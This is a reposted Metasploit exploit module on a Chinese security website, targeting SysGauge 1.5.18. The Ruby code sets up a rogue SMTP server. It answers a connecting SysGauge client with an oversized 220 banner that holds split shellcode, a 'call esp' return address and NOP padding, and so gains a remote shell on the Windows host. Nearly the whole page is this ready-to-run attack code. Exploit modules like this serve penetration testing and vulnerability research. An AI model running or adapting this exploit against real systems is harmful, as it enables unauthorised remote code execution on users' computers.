首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)
来源:metasploit.com 作者:Higgins 发布时间:2017-03-23  
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
 
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::TcpServer
 
  Rank = NormalRanking
 
  def initialize()
    super(
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
      'Description'    => %q{
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
        via its SMTP server validation. The module sends a malicious response along in the
        220 service ready response and exploits the client, resulting in an unprivileged shell.
      },
      'Author'         =>
      [
        'Chris Higgins', # msf Module -- @ch1gg1ns
        'Peter Baris'    # Initial discovery and PoC
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
      [
        [ 'EDB', '41479' ],
      ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread'
      },
      'Payload'        =>
      {
        'Space' => 306,
        'BadChars' => "\x00\x0a\x0d\x20"
      },
      'Platform'  => 'win',
      'Targets'       =>
      [
        [ 'Windows Universal',
          {
            'Offset' => 176,
            'Ret'    => 0x6527635E # call esp # QtGui4.dll
          }
        ]
      ],
      'Privileged'    => false,
      'DisclosureDate' => 'Feb 28 2017',
      'DefaultTarget' => 0
      )
    register_options(
      [
      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
      ])
  end
 
  def on_client_connect(c)
    # Note here that the payload must be split into two parts.
    # The payload gets jumbled in the stack so we need to split
    # and align to get it to execute correctly.
    sploit =  "220 "
    sploit << rand_text(target['Offset'])
    # Can only use the last part starting from 232 bytes in
    sploit << payload.encoded[232..-1]
    sploit << rand_text(2)
    sploit << [target.ret].pack('V')
    sploit << rand_text(12)
    sploit << make_nops(8)
    # And the first part up to 232 bytes
    sploit << payload.encoded[0..231]
    sploit << "ESMTP Sendmail \r\n"
 
    print_status("Client connected: " + c.peerhost)
    print_status("Sending payload...")
 
    c.put(sploit)
  end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SpyCamLizard 1.230 - Denial of
·OpenSSH On Cygwin SFTP Client
·Disk Sorter Enterprise 9.5.12
·D-Link DSL-2640B Remote DNS Ch
·dnaLIMS Admin Module Command E
·Logsign Remote Command Injecti
·D-Link DGS-1510 - Multiple Vul
·NETGEAR WNR2000v5 (Un)authenti
·Microsoft Internet Explorer -
·VMware Host Guest Client Redir
·Mozilla Firefox - 'table' Use-
·Nuxeo Platform 6.x / 7.x Shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved